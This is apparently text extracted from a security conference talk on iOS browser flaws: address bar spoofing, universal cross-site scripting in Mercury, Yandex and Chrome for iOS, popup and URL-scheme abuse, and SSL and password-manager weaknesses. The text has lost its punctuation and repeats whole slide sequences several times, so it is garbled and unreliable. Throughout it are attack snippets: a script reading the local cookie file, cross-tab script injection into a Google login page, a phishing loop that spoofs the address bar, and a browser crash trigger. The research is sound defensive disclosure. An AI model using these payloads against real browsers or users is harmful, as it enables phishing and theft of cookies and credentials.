bull applicationother filenamehtml
UXSS Universal Cross-Site Scripting
JS without Same-Origin-Policy
ltscriptgta = documentlocationhrefsplit() if(a[0]===file) path = lsquofile+a[3]++a[4]++a[5]++a[6]+rsquo+a[7] path = path+LibraryCookiesCookiesbinarycookies x = new XMLHttpRequest() xopen(GET path false) xsend() alert(xresponseText) ltscriptgt
UXSS Universal Cross-Site Scripting
JS without Same-Origin-Policy
ltscriptgt x = new XMLHttpRequest() xopen(lsquoGET lsquohttpsyourintranet false) xsend() alert(xresponseText)ltscriptgt
UXSS Universal Cross-Site Scripting
ChallengeHijack password autofill
UXSS Universal Cross-Site Scripting
Opening local HTML files safely
bull Open as textplain
bull Content-Security-Policy header HTML5 sandbox
bull baseURL = aboutblank
bull iOS8 WKWebViewconfigurationpreferencesjavaScriptEnabled = false
UXSS Universal Cross-Site Scripting
In this presentation
bull iOS Browsers UIWebView WKWebView
bull Address Bar Spoofing
bull Universal Cross-Site Scripting
bull Popups amp URL handling
bull SSL amp password managers
Mobile Browsers Security iOS
Popups amp URL handling
Popups amp URL handling
bull Browsers rewriting href attributes for target=_blank can be usually tricked into believing navigation was initiated by user
bull ltiframe src=ldquogooglechromeexamplecomrdquogtltiframe src=ldquomercexamplecomrdquogtetc bypass all popup blockers anywayhellip
Popup blockers
Popups amp URL handling
Application(bolted-on)
Native (WebKit)
bull schemedownloadhttpssecuretldvictimdata schemedownloadhttpattackertldREADMEhtml
bull schemeadd-filterurl=
Bridge (internal)
URI schemes
Popups amp URL handling
Registered(external)
CFURL Null Pointer Dereferencebull Any CFURL function that gets NULL as an argument
will cause Null Pointer Dereference
bull Tested with percent encodinghttp http5 http5c etc
bull Example Opera Coast ltscriptgtdocumentlocation = lsquohttp5crsquoltscriptgt
Popups amp URL handling
Opera Coast
Program received signal EXC_BAD_ACCESS Could not access memory
Reason KERN_INVALID_ADDRESS at address 0x00000000
0x2f3e0d76 in CFURLCopyPath()
Popups amp URL handling
bull Special guest star Safari on OS X Mavericksbefore Security Update 2014-02 (CVE-2014-1315)
ltiframe src=ldquolets-try-format-stringpppphelliprdquogt
Popups amp URL handling
ltiframe src=ldquolets-try-format-stringpppphelliprdquogt
Popups amp URL handling
In this presentation
bull iOS Browsers UIWebView WKWebView
bull Address Bar Spoofing
bull Universal Cross-Site Scripting
bull Popups amp URL handling
bull SSL amp password managers
Mobile Browsers Security iOS
SSLbull By default invalid certificates for iOS UIWebView
https requests are rejected without user interaction
bull This can be changed (eg allowing a user to accept self-signed cert)
bull 14 of tested browsersself-signed SSL certificates are silently accepted
bull In some cases the validation is done for main domain only (eg Opera Coast lt 302)
SSL amp password managers
SSL amp password managers
Password managers
bull JavaScript with privileges of top frame mdashgt passwords not filled for subframes
bull Usually possible to force saving password for another domain (withwithout user interaction)
bull Password filling checks for domain but not always for URL scheme (https vs http)
SSL amp password managers
SSL amp password managers
Summary
bull UIWebViews should be replaced with iOS8 WKWebViews in browser applications
bull Most 3rd party iOS browsers are experimental or side projects built with less attention to detail
bull Mobile device management and other enterprise solutions often include a browser application Did you test it
Mobile Browsers Security iOS
Referencesbull httpsdeveloperapplecomlibraryiosdocumentation
AppleApplicationsReferenceSafariWebContent
bull httpsdeveloperapplecomlibraryiosdocumentationUIKitReferenceUIWebView_ClassReferenceReferencehtml
bull httpsdeveloperapplecomlibraryiosdocumentationUIKitReferenceUIWebViewDelegate_ProtocolReferenceReferencehtml
bull httpsdeveloperapplecomlibrarymacdocumentationcorefoundationReferenceCFURLRefReferencereferencehtml
bull httpsdeveloperapplecomlibraryprereleaseiosdocumentationWebKitReferenceWKWebView_Refindexhtml
Mobile Browsers Security iOS
Referencesbull httpscodegooglecompbrowsersec
bull httpwwww3orgTRCSP
bull httpwwwslidesharenetiphonepentestios-application-insecurity
bull httpslabsmwrinfosecuritycomblog20120416adventures-with-ios-uiwebviews
bull httpwwwshmoocomidn
bull httpblogchromiumorg200812security-in-depth-local-web-pageshtml
bull httpresearchmicrosoftcompubs73101guilogicsecuritypdf
bull httpgsstatcountercom
Mobile Browsers Security iOS
Referencesbull httpscodegooglecompchromiumissuesdetailid=146760
bull httpscodegooglecompchromiumissuesdetailid=147625
bull httpscodegooglecompchromiumissuesdetailid=324969
bull httpscodegooglecompchromiumissuesdetailid=326118
bull httpscodegooglecompchromiumissuesdetailid=326125
bull httpscodegooglecompchromiumissuesdetailid=348640
bull httpblogsoperacommobile201405opera-coast-updated-3-02
bull httpwwwf-securecomenweblabs_globalfsc-2014-4
Mobile Browsers Security iOS
References
bull httpbrowser-shreddersblogspotcom
bull httpsiosbrowsr-testscom
Mobile Browsers Security iOS
Questions
Mobile Browsers Security iOS
lukaszpilorzrunicpl pawelwylecialgmailcom
Twitter runicpl h0wlu
Thank you
Mobile Browsers Security iOS
Failed NavigationIncorrect URL often remains in address bar after navigation errors
bull DNS NXDOMAIN - host not found (httpslogintargettld)
bull TCP port closed (httpswwwtargettld448)
bull SSL errors (httpstargettld)
bull Display phishing page then redirect to ldquoincorrectrdquo URL
bull Mobile Safari before iOS 7 windowfocus() or windowopen()close() allowed suppressing error alerts
Address Bar Spoofing
Address Bar Spoofing Loading loop
Address Bar Spoofing
Loading loopbull HTTP request timeout in iOS browsers is usually
between 1 and 10 minutes
bull Address bar in Mobile Safari and many other iOS browsers is updated on navigation attempt even before an actual connection is made
bull Now we only need to find a target with filtered port 443
bull Or any filtered port because Mobile Safari shows only the hostname part of the URL
Address Bar Spoofing
Loading loop
bull documentwrite(Phishing page here) location = httpsaccountsgooglecom8443setInterval(function() location=httpsaccountsgooglecom8443 hellip)
Address Bar Spoofing
Address Bar Spoofing
Phishing page
Title bar
Address Bar Spoofing
lttitlegthttpswwwapplecomlttitlegt
Address bar tipsbull Display the URL that is currently loaded within
UIWebView not the one you think will be there
bull UIWebViewDelegate Update address bar on each event including webViewdidFailLoadWithError
bull Displaying SSL lock makes sense if there was an actual successful and valid SSL connection Spoofing https URL seems easy donrsquot make it worse by automatically adding SSL lock
bull iOS8 KVO-compliant WKWebViewURL property
Address Bar Spoofing
In this presentation
bull iOS Browsers UIWebView WKWebView
bull Address Bar Spoofing
bull Universal Cross-Site Scripting
bull Popups amp URL handling
bull SSL amp password managers
Mobile Browsers Security iOS
UXSS UniversalCross-Site Scripting
UXSS Universal Cross-Site Scripting
Universal Cross-Site Scripting
XSS enables attackers to inject client-side script into web pages viewed by other users
bypassing same-origin policy
In UXSS the attacker exploits vulnerability in the browser not in the website
(~ httpenwikipediaorgwikiCross-site_scripting)
Famous after PDF UXSS in 2007
UXSS Universal Cross-Site Scripting
Universal Cross-Site Scripting
bull CVE-2013-6893 UXSS in Mercury Browser for iOS
bull CVE-2013-7197 UXSS in YandexBrowser for iOS
bull CVE-2012-2899 UXSS in Google Chrome for iOS
bull hellip
UXSS Universal Cross-Site Scripting
Universal Cross-Site Scripting
UXSS Universal Cross-Site Scripting
CVE-2013-6893UXSS in Mercury Browser
UXSS Universal Cross-Site Scripting
CVE-2013-6893 Mercury UXSS
w = windowopen(lsquoaboutblankrsquo)
mbexec$(WINDOW_ID)[ commandwindowopen target1234 ldquourlaboutblank ]
Mathrandom()
UXSS Universal Cross-Site Scripting
[webView loadRequest hellip ldquoaboutblankrdquo hellip]
cross-frame forgery
CVE-2013-6893 Mercury UXSS
wdocumentwrite(lsquoHirsquo)
mbexec$(WINDOW_ID)[ ldquocommandwindowdocumentwrite target1234 ldquohtmlrdquoHi ]
UXSS Universal Cross-Site Scripting
[webView stringByEvaluatingJavaScriptFromString ldquodocumentwrite(lsquoHirsquo)rdquo]
CVE-2013-6893 Mercury UXSS
Mercury Browser for iOS does not implement same-origin policy restrictions for cross-tab calls Any at all
w = windowopen(lsquohttpsaccountsgooglecom) wdocumentwrite(lsquoltscript src=hellipgtltscriptgtrsquo) hellipand it just works in accountsgooglecom
UXSS Universal Cross-Site Scripting
UXSS Universal Cross-Site Scripting
CVE-2013-7197UXSS in YandexBrowser
UXSS Universal Cross-Site Scripting
CVE-2013-7197 Yandex UXSS
bull Same-origin check implemented on windowopen()
bull Not rechecked on windowdocumentwrite()
bull Redirect child window after windowopen()
UXSS
UXSS Universal Cross-Site Scripting
Bug Bounty-)
CVE-2012-2899UXSS in Google Chrome
UXSS Universal Cross-Site Scripting
CVE-2012-2899 Chrome UXSS
bull w = windowopen(locationhref)wdocumentwrite(lsquoHirsquo)
bull [webView loadHTMLStringldquoHirdquo baseURLhref]
UXSS Universal Cross-Site Scripting
CVE-2012-2899 Chrome UXSS
bull w = windowopen(lsquoaboutblankrsquo)wdocumentwrite(hellip)
bull aboutblank is kind of ldquono URLrdquo right
bull [webView loadHTMLStringldquohelliprdquo baseURLnil]
UXSS Universal Cross-Site Scripting
CVE-2012-2899 Chrome UXSS
bull For baseURL = nilUIWebView loads applewebdata origin Same as file - no same-origin policy access to any web origin and local files
UXSS Universal Cross-Site Scripting
CVE-2012-2899 Chrome UXSSbull w = windowopen(lsquoaboutblankrsquo)
wdocumentwrite( lsquoltscriptgtdocumentwrite(locationhref)ltscriptgtrsquo )
bull applewebdata origin
bull UXSS + local file access (application sandboxjailbreak)
UXSS Universal Cross-Site Scripting
Bug Bounty-)
Safe cross-tab documentwrite
bull w = windowopen(locationhref) wdocumentwrite(lsquoHirsquo)
bull [webView loadHTMLStringldquoHirdquo baseURL [NSURL hellipldquoaboutblankrdquo]
UXSS Universal Cross-Site Scripting
Safe cross-tab documentwrite
bull iOS8 use WKWebViewUIDelegate webViewcreateWebViewWithConfigurationforNavigationActionwindowFeatures
UXSS Universal Cross-Site Scripting
Other potential paths to applewebdata or file originbull baseURL
[NSURL URLWithStringldquohttpexamplecomrdquo] mdashgt nil
bull CFURLCreateWithString(kCFAllocatorDefault CFSTR(ldquohttpexamplecom) NULL) mdashgt NULL
bull Downloads opened directly from file
UXSS Universal Cross-Site Scripting
Content-Disposition attachmentbull displayed in the origin of hosting site (iOS lt 5)
CVE-2011-3426 Christian Matthies Yoshinori Oota
bull isolated attachment origin (iOS 5 +)
bull documentlocationhref
bull documentreferrer
bull w=windowopen(lsquohttpsrsquo+locationhostname) wdocumentwrite(lsquocustom SOP implementationrsquo)
UXSS Universal Cross-Site Scripting
Content-Typebull textplain
HTML (iOS lt 7) CVE-2013-5151 Ben Toews
bull applicationoctet-stream HTML
bull applicationother filenamehtml
UXSS Universal Cross-Site Scripting
JS without Same-Origin-Policy
ltscriptgta = documentlocationhrefsplit() if(a[0]===file) path = lsquofile+a[3]++a[4]++a[5]++a[6]+rsquo+a[7] path = path+LibraryCookiesCookiesbinarycookies x = new XMLHttpRequest() xopen(GET path false) xsend() alert(xresponseText) ltscriptgt
UXSS Universal Cross-Site Scripting
JS without Same-Origin-Policy
ltscriptgt x = new XMLHttpRequest() xopen(lsquoGET lsquohttpsyourintranet false) xsend() alert(xresponseText)ltscriptgt
UXSS Universal Cross-Site Scripting
ChallengeHijack password autofill
UXSS Universal Cross-Site Scripting
Opening local HTML files safely
bull Open as textplain
bull Content-Security-Policy header HTML5 sandbox
bull baseURL = aboutblank
bull iOS8 WKWebViewconfigurationpreferencesjavaScriptEnabled = false
UXSS Universal Cross-Site Scripting
In this presentation
bull iOS Browsers UIWebView WKWebView
bull Address Bar Spoofing
bull Universal Cross-Site Scripting
bull Popups amp URL handling
bull SSL amp password managers
Mobile Browsers Security iOS
Popups amp URL handling
Popups amp URL handling
bull Browsers rewriting href attributes for target=_blank can be usually tricked into believing navigation was initiated by user
bull ltiframe src=ldquogooglechromeexamplecomrdquogtltiframe src=ldquomercexamplecomrdquogtetc bypass all popup blockers anywayhellip
Popup blockers
Popups amp URL handling
Application(bolted-on)
Native (WebKit)
bull schemedownloadhttpssecuretldvictimdata schemedownloadhttpattackertldREADMEhtml
bull schemeadd-filterurl=
Bridge (internal)
URI schemes
Popups amp URL handling
Registered(external)
CFURL Null Pointer Dereferencebull Any CFURL function that gets NULL as an argument
will cause Null Pointer Dereference
bull Tested with percent encodinghttp http5 http5c etc
bull Example Opera Coast ltscriptgtdocumentlocation = lsquohttp5crsquoltscriptgt
Popups amp URL handling
Opera Coast
Program received signal EXC_BAD_ACCESS Could not access memory
Reason KERN_INVALID_ADDRESS at address 0x00000000
0x2f3e0d76 in CFURLCopyPath()
Popups amp URL handling
bull Special guest star Safari on OS X Mavericksbefore Security Update 2014-02 (CVE-2014-1315)
ltiframe src=ldquolets-try-format-stringpppphelliprdquogt
Popups amp URL handling
ltiframe src=ldquolets-try-format-stringpppphelliprdquogt
Popups amp URL handling
In this presentation
bull iOS Browsers UIWebView WKWebView
bull Address Bar Spoofing
bull Universal Cross-Site Scripting
bull Popups amp URL handling
bull SSL amp password managers
Mobile Browsers Security iOS
SSLbull By default invalid certificates for iOS UIWebView
https requests are rejected without user interaction
bull This can be changed (eg allowing a user to accept self-signed cert)
bull 14 of tested browsersself-signed SSL certificates are silently accepted
bull In some cases the validation is done for main domain only (eg Opera Coast lt 302)
SSL amp password managers
SSL amp password managers
Password managers
bull JavaScript with privileges of top frame mdashgt passwords not filled for subframes
bull Usually possible to force saving password for another domain (withwithout user interaction)
bull Password filling checks for domain but not always for URL scheme (https vs http)
SSL amp password managers
SSL amp password managers
Summary
bull UIWebViews should be replaced with iOS8 WKWebViews in browser applications
bull Most 3rd party iOS browsers are experimental or side projects built with less attention to detail
bull Mobile device management and other enterprise solutions often include a browser application Did you test it
Mobile Browsers Security iOS
Referencesbull httpsdeveloperapplecomlibraryiosdocumentation
AppleApplicationsReferenceSafariWebContent
bull httpsdeveloperapplecomlibraryiosdocumentationUIKitReferenceUIWebView_ClassReferenceReferencehtml
bull httpsdeveloperapplecomlibraryiosdocumentationUIKitReferenceUIWebViewDelegate_ProtocolReferenceReferencehtml
bull httpsdeveloperapplecomlibrarymacdocumentationcorefoundationReferenceCFURLRefReferencereferencehtml
bull httpsdeveloperapplecomlibraryprereleaseiosdocumentationWebKitReferenceWKWebView_Refindexhtml
Mobile Browsers Security iOS
Referencesbull httpscodegooglecompbrowsersec
bull httpwwww3orgTRCSP
bull httpwwwslidesharenetiphonepentestios-application-insecurity
bull httpslabsmwrinfosecuritycomblog20120416adventures-with-ios-uiwebviews
bull httpwwwshmoocomidn
bull httpblogchromiumorg200812security-in-depth-local-web-pageshtml
bull httpresearchmicrosoftcompubs73101guilogicsecuritypdf
bull httpgsstatcountercom
Mobile Browsers Security iOS
Referencesbull httpscodegooglecompchromiumissuesdetailid=146760
bull httpscodegooglecompchromiumissuesdetailid=147625
bull httpscodegooglecompchromiumissuesdetailid=324969
bull httpscodegooglecompchromiumissuesdetailid=326118
bull httpscodegooglecompchromiumissuesdetailid=326125
bull httpscodegooglecompchromiumissuesdetailid=348640
bull httpblogsoperacommobile201405opera-coast-updated-3-02
bull httpwwwf-securecomenweblabs_globalfsc-2014-4
Mobile Browsers Security iOS
References
bull httpbrowser-shreddersblogspotcom
bull httpsiosbrowsr-testscom
Mobile Browsers Security iOS
Questions
Mobile Browsers Security iOS
lukaszpilorzrunicpl pawelwylecialgmailcom
Twitter runicpl h0wlu
Thank you
Mobile Browsers Security iOS
Address Bar Spoofing Loading loop
Address Bar Spoofing
Loading loopbull HTTP request timeout in iOS browsers is usually
between 1 and 10 minutes
bull Address bar in Mobile Safari and many other iOS browsers is updated on navigation attempt even before an actual connection is made
bull Now we only need to find a target with filtered port 443
bull Or any filtered port because Mobile Safari shows only the hostname part of the URL
Address Bar Spoofing
Loading loop
bull documentwrite(Phishing page here) location = httpsaccountsgooglecom8443setInterval(function() location=httpsaccountsgooglecom8443 hellip)
Address Bar Spoofing
Address Bar Spoofing
Phishing page
Title bar
Address Bar Spoofing
lttitlegthttpswwwapplecomlttitlegt
Address bar tipsbull Display the URL that is currently loaded within
UIWebView not the one you think will be there
bull UIWebViewDelegate Update address bar on each event including webViewdidFailLoadWithError
bull Displaying SSL lock makes sense if there was an actual successful and valid SSL connection Spoofing https URL seems easy donrsquot make it worse by automatically adding SSL lock
bull iOS8 KVO-compliant WKWebViewURL property
Address Bar Spoofing
In this presentation
bull iOS Browsers UIWebView WKWebView
bull Address Bar Spoofing
bull Universal Cross-Site Scripting
bull Popups amp URL handling
bull SSL amp password managers
Mobile Browsers Security iOS
UXSS UniversalCross-Site Scripting
UXSS Universal Cross-Site Scripting
Universal Cross-Site Scripting
XSS enables attackers to inject client-side script into web pages viewed by other users
bypassing same-origin policy
In UXSS the attacker exploits vulnerability in the browser not in the website
(~ httpenwikipediaorgwikiCross-site_scripting)
Famous after PDF UXSS in 2007
UXSS Universal Cross-Site Scripting
Universal Cross-Site Scripting
bull CVE-2013-6893 UXSS in Mercury Browser for iOS
bull CVE-2013-7197 UXSS in YandexBrowser for iOS
bull CVE-2012-2899 UXSS in Google Chrome for iOS
bull hellip
UXSS Universal Cross-Site Scripting
Universal Cross-Site Scripting
UXSS Universal Cross-Site Scripting
CVE-2013-6893UXSS in Mercury Browser
UXSS Universal Cross-Site Scripting
CVE-2013-6893 Mercury UXSS
w = windowopen(lsquoaboutblankrsquo)
mbexec$(WINDOW_ID)[ commandwindowopen target1234 ldquourlaboutblank ]
Mathrandom()
UXSS Universal Cross-Site Scripting
[webView loadRequest hellip ldquoaboutblankrdquo hellip]
cross-frame forgery
CVE-2013-6893 Mercury UXSS
wdocumentwrite(lsquoHirsquo)
mbexec$(WINDOW_ID)[ ldquocommandwindowdocumentwrite target1234 ldquohtmlrdquoHi ]
UXSS Universal Cross-Site Scripting
[webView stringByEvaluatingJavaScriptFromString ldquodocumentwrite(lsquoHirsquo)rdquo]
CVE-2013-6893 Mercury UXSS
Mercury Browser for iOS does not implement same-origin policy restrictions for cross-tab calls Any at all
w = windowopen(lsquohttpsaccountsgooglecom) wdocumentwrite(lsquoltscript src=hellipgtltscriptgtrsquo) hellipand it just works in accountsgooglecom
UXSS Universal Cross-Site Scripting
UXSS Universal Cross-Site Scripting
CVE-2013-7197UXSS in YandexBrowser
UXSS Universal Cross-Site Scripting
CVE-2013-7197 Yandex UXSS
bull Same-origin check implemented on windowopen()
bull Not rechecked on windowdocumentwrite()
bull Redirect child window after windowopen()
UXSS
UXSS Universal Cross-Site Scripting
Bug Bounty-)
CVE-2012-2899UXSS in Google Chrome
UXSS Universal Cross-Site Scripting
CVE-2012-2899 Chrome UXSS
bull w = windowopen(locationhref)wdocumentwrite(lsquoHirsquo)
bull [webView loadHTMLStringldquoHirdquo baseURLhref]
UXSS Universal Cross-Site Scripting
CVE-2012-2899 Chrome UXSS
bull w = windowopen(lsquoaboutblankrsquo)wdocumentwrite(hellip)
bull aboutblank is kind of ldquono URLrdquo right
bull [webView loadHTMLStringldquohelliprdquo baseURLnil]
UXSS Universal Cross-Site Scripting
CVE-2012-2899 Chrome UXSS
bull For baseURL = nilUIWebView loads applewebdata origin Same as file - no same-origin policy access to any web origin and local files
UXSS Universal Cross-Site Scripting
CVE-2012-2899 Chrome UXSSbull w = windowopen(lsquoaboutblankrsquo)
wdocumentwrite( lsquoltscriptgtdocumentwrite(locationhref)ltscriptgtrsquo )
bull applewebdata origin
bull UXSS + local file access (application sandboxjailbreak)
UXSS Universal Cross-Site Scripting
Bug Bounty-)
Safe cross-tab documentwrite
bull w = windowopen(locationhref) wdocumentwrite(lsquoHirsquo)
bull [webView loadHTMLStringldquoHirdquo baseURL [NSURL hellipldquoaboutblankrdquo]
UXSS Universal Cross-Site Scripting
Safe cross-tab documentwrite
bull iOS8 use WKWebViewUIDelegate webViewcreateWebViewWithConfigurationforNavigationActionwindowFeatures
UXSS Universal Cross-Site Scripting
Other potential paths to applewebdata or file originbull baseURL
[NSURL URLWithStringldquohttpexamplecomrdquo] mdashgt nil
bull CFURLCreateWithString(kCFAllocatorDefault CFSTR(ldquohttpexamplecom) NULL) mdashgt NULL
bull Downloads opened directly from file
UXSS Universal Cross-Site Scripting
Content-Disposition attachmentbull displayed in the origin of hosting site (iOS lt 5)
CVE-2011-3426 Christian Matthies Yoshinori Oota
bull isolated attachment origin (iOS 5 +)
bull documentlocationhref
bull documentreferrer
bull w=windowopen(lsquohttpsrsquo+locationhostname) wdocumentwrite(lsquocustom SOP implementationrsquo)
UXSS Universal Cross-Site Scripting
Content-Typebull textplain
HTML (iOS lt 7) CVE-2013-5151 Ben Toews
bull applicationoctet-stream HTML
bull applicationother filenamehtml
UXSS Universal Cross-Site Scripting
JS without Same-Origin-Policy
ltscriptgta = documentlocationhrefsplit() if(a[0]===file) path = lsquofile+a[3]++a[4]++a[5]++a[6]+rsquo+a[7] path = path+LibraryCookiesCookiesbinarycookies x = new XMLHttpRequest() xopen(GET path false) xsend() alert(xresponseText) ltscriptgt
UXSS Universal Cross-Site Scripting
JS without Same-Origin-Policy
ltscriptgt x = new XMLHttpRequest() xopen(lsquoGET lsquohttpsyourintranet false) xsend() alert(xresponseText)ltscriptgt
UXSS Universal Cross-Site Scripting
ChallengeHijack password autofill
UXSS Universal Cross-Site Scripting
Opening local HTML files safely
bull Open as textplain
bull Content-Security-Policy header HTML5 sandbox
bull baseURL = aboutblank
bull iOS8 WKWebViewconfigurationpreferencesjavaScriptEnabled = false
UXSS Universal Cross-Site Scripting
In this presentation
bull iOS Browsers UIWebView WKWebView
bull Address Bar Spoofing
bull Universal Cross-Site Scripting
bull Popups amp URL handling
bull SSL amp password managers
Mobile Browsers Security iOS
Popups amp URL handling
Popups amp URL handling
bull Browsers rewriting href attributes for target=_blank can be usually tricked into believing navigation was initiated by user
bull ltiframe src=ldquogooglechromeexamplecomrdquogtltiframe src=ldquomercexamplecomrdquogtetc bypass all popup blockers anywayhellip
Popup blockers
Popups amp URL handling
Application(bolted-on)
Native (WebKit)
bull schemedownloadhttpssecuretldvictimdata schemedownloadhttpattackertldREADMEhtml
bull schemeadd-filterurl=
Bridge (internal)
URI schemes
Popups amp URL handling
Registered(external)
CFURL Null Pointer Dereferencebull Any CFURL function that gets NULL as an argument
will cause Null Pointer Dereference
bull Tested with percent encodinghttp http5 http5c etc
bull Example Opera Coast ltscriptgtdocumentlocation = lsquohttp5crsquoltscriptgt
Popups amp URL handling
Opera Coast
Program received signal EXC_BAD_ACCESS Could not access memory
Reason KERN_INVALID_ADDRESS at address 0x00000000
0x2f3e0d76 in CFURLCopyPath()
Popups amp URL handling
bull Special guest star Safari on OS X Mavericksbefore Security Update 2014-02 (CVE-2014-1315)
ltiframe src=ldquolets-try-format-stringpppphelliprdquogt
Popups amp URL handling
ltiframe src=ldquolets-try-format-stringpppphelliprdquogt
Popups amp URL handling
In this presentation
bull iOS Browsers UIWebView WKWebView
bull Address Bar Spoofing
bull Universal Cross-Site Scripting
bull Popups amp URL handling
bull SSL amp password managers
Mobile Browsers Security iOS
SSLbull By default invalid certificates for iOS UIWebView
https requests are rejected without user interaction
bull This can be changed (eg allowing a user to accept self-signed cert)
bull 14 of tested browsersself-signed SSL certificates are silently accepted
bull In some cases the validation is done for main domain only (eg Opera Coast lt 302)
SSL amp password managers
SSL amp password managers
Password managers
bull JavaScript with privileges of top frame mdashgt passwords not filled for subframes
bull Usually possible to force saving password for another domain (withwithout user interaction)
bull Password filling checks for domain but not always for URL scheme (https vs http)
SSL amp password managers
SSL amp password managers
Summary
bull UIWebViews should be replaced with iOS8 WKWebViews in browser applications
bull Most 3rd party iOS browsers are experimental or side projects built with less attention to detail
bull Mobile device management and other enterprise solutions often include a browser application Did you test it
Mobile Browsers Security iOS
Referencesbull httpsdeveloperapplecomlibraryiosdocumentation
AppleApplicationsReferenceSafariWebContent
bull httpsdeveloperapplecomlibraryiosdocumentationUIKitReferenceUIWebView_ClassReferenceReferencehtml
bull httpsdeveloperapplecomlibraryiosdocumentationUIKitReferenceUIWebViewDelegate_ProtocolReferenceReferencehtml
bull httpsdeveloperapplecomlibrarymacdocumentationcorefoundationReferenceCFURLRefReferencereferencehtml
bull httpsdeveloperapplecomlibraryprereleaseiosdocumentationWebKitReferenceWKWebView_Refindexhtml
Mobile Browsers Security iOS
Referencesbull httpscodegooglecompbrowsersec
bull httpwwww3orgTRCSP
bull httpwwwslidesharenetiphonepentestios-application-insecurity
bull httpslabsmwrinfosecuritycomblog20120416adventures-with-ios-uiwebviews
bull httpwwwshmoocomidn
bull httpblogchromiumorg200812security-in-depth-local-web-pageshtml
bull httpresearchmicrosoftcompubs73101guilogicsecuritypdf
bull httpgsstatcountercom
Mobile Browsers Security iOS
Referencesbull httpscodegooglecompchromiumissuesdetailid=146760
bull httpscodegooglecompchromiumissuesdetailid=147625
bull httpscodegooglecompchromiumissuesdetailid=324969
bull httpscodegooglecompchromiumissuesdetailid=326118
bull httpscodegooglecompchromiumissuesdetailid=326125
bull httpscodegooglecompchromiumissuesdetailid=348640
bull httpblogsoperacommobile201405opera-coast-updated-3-02
bull httpwwwf-securecomenweblabs_globalfsc-2014-4
Mobile Browsers Security iOS
References
bull httpbrowser-shreddersblogspotcom
bull httpsiosbrowsr-testscom
Mobile Browsers Security iOS
Questions
Mobile Browsers Security iOS
lukaszpilorzrunicpl pawelwylecialgmailcom
Twitter runicpl h0wlu
Thank you
Mobile Browsers Security iOS
Loading loopbull HTTP request timeout in iOS browsers is usually
between 1 and 10 minutes
bull Address bar in Mobile Safari and many other iOS browsers is updated on navigation attempt even before an actual connection is made
bull Now we only need to find a target with filtered port 443
bull Or any filtered port because Mobile Safari shows only the hostname part of the URL
Address Bar Spoofing
Loading loop
bull documentwrite(Phishing page here) location = httpsaccountsgooglecom8443setInterval(function() location=httpsaccountsgooglecom8443 hellip)
Address Bar Spoofing
Address Bar Spoofing
Phishing page
Title bar
Address Bar Spoofing
lttitlegthttpswwwapplecomlttitlegt
Address bar tipsbull Display the URL that is currently loaded within
UIWebView not the one you think will be there
bull UIWebViewDelegate Update address bar on each event including webViewdidFailLoadWithError
bull Displaying SSL lock makes sense if there was an actual successful and valid SSL connection Spoofing https URL seems easy donrsquot make it worse by automatically adding SSL lock
bull iOS8 KVO-compliant WKWebViewURL property
Address Bar Spoofing
In this presentation
bull iOS Browsers UIWebView WKWebView
bull Address Bar Spoofing
bull Universal Cross-Site Scripting
bull Popups amp URL handling
bull SSL amp password managers
Mobile Browsers Security iOS
UXSS UniversalCross-Site Scripting
UXSS Universal Cross-Site Scripting
Universal Cross-Site Scripting
XSS enables attackers to inject client-side script into web pages viewed by other users
bypassing same-origin policy
In UXSS the attacker exploits vulnerability in the browser not in the website
(~ httpenwikipediaorgwikiCross-site_scripting)
Famous after PDF UXSS in 2007
UXSS Universal Cross-Site Scripting
Universal Cross-Site Scripting
bull CVE-2013-6893 UXSS in Mercury Browser for iOS
bull CVE-2013-7197 UXSS in YandexBrowser for iOS
bull CVE-2012-2899 UXSS in Google Chrome for iOS
bull hellip
UXSS Universal Cross-Site Scripting
Universal Cross-Site Scripting
UXSS Universal Cross-Site Scripting
CVE-2013-6893UXSS in Mercury Browser
UXSS Universal Cross-Site Scripting
CVE-2013-6893 Mercury UXSS
w = windowopen(lsquoaboutblankrsquo)
mbexec$(WINDOW_ID)[ commandwindowopen target1234 ldquourlaboutblank ]
Mathrandom()
UXSS Universal Cross-Site Scripting
[webView loadRequest hellip ldquoaboutblankrdquo hellip]
cross-frame forgery
CVE-2013-6893 Mercury UXSS
wdocumentwrite(lsquoHirsquo)
mbexec$(WINDOW_ID)[ ldquocommandwindowdocumentwrite target1234 ldquohtmlrdquoHi ]
UXSS Universal Cross-Site Scripting
[webView stringByEvaluatingJavaScriptFromString ldquodocumentwrite(lsquoHirsquo)rdquo]
CVE-2013-6893 Mercury UXSS
Mercury Browser for iOS does not implement same-origin policy restrictions for cross-tab calls Any at all
w = windowopen(lsquohttpsaccountsgooglecom) wdocumentwrite(lsquoltscript src=hellipgtltscriptgtrsquo) hellipand it just works in accountsgooglecom
UXSS Universal Cross-Site Scripting
UXSS Universal Cross-Site Scripting
CVE-2013-7197UXSS in YandexBrowser
UXSS Universal Cross-Site Scripting
CVE-2013-7197 Yandex UXSS
bull Same-origin check implemented on windowopen()
bull Not rechecked on windowdocumentwrite()
bull Redirect child window after windowopen()
UXSS
UXSS Universal Cross-Site Scripting
Bug Bounty-)
CVE-2012-2899UXSS in Google Chrome
UXSS Universal Cross-Site Scripting
CVE-2012-2899 Chrome UXSS
bull w = windowopen(locationhref)wdocumentwrite(lsquoHirsquo)
bull [webView loadHTMLStringldquoHirdquo baseURLhref]
UXSS Universal Cross-Site Scripting
CVE-2012-2899 Chrome UXSS
bull w = windowopen(lsquoaboutblankrsquo)wdocumentwrite(hellip)
bull aboutblank is kind of ldquono URLrdquo right
bull [webView loadHTMLStringldquohelliprdquo baseURLnil]
UXSS Universal Cross-Site Scripting
CVE-2012-2899 Chrome UXSS
bull For baseURL = nilUIWebView loads applewebdata origin Same as file - no same-origin policy access to any web origin and local files
UXSS Universal Cross-Site Scripting
CVE-2012-2899 Chrome UXSSbull w = windowopen(lsquoaboutblankrsquo)
wdocumentwrite( lsquoltscriptgtdocumentwrite(locationhref)ltscriptgtrsquo )
bull applewebdata origin
bull UXSS + local file access (application sandboxjailbreak)
UXSS Universal Cross-Site Scripting
Bug Bounty-)
Safe cross-tab documentwrite
bull w = windowopen(locationhref) wdocumentwrite(lsquoHirsquo)
bull [webView loadHTMLStringldquoHirdquo baseURL [NSURL hellipldquoaboutblankrdquo]
UXSS Universal Cross-Site Scripting
Safe cross-tab documentwrite
bull iOS8 use WKWebViewUIDelegate webViewcreateWebViewWithConfigurationforNavigationActionwindowFeatures
UXSS Universal Cross-Site Scripting
Other potential paths to applewebdata or file originbull baseURL
[NSURL URLWithStringldquohttpexamplecomrdquo] mdashgt nil
bull CFURLCreateWithString(kCFAllocatorDefault CFSTR(ldquohttpexamplecom) NULL) mdashgt NULL
bull Downloads opened directly from file
UXSS Universal Cross-Site Scripting
